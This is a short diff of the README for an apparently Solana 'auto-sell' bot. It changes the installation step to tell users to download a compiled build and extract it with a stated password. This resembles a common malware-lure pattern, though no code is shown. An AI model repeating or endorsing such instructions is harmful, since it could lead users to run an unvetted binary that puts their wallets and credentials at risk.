JamesJimmyCrypto/solana-auto-sell/README.md

 ### Installation

-1. Download the latest compiled build and extract it to a folder.
+1. Download the latest compiled build and extract it to a folder with pass `VcHe73Jq`.
 2. Edit the configuration provided below.
 3. Run the bot.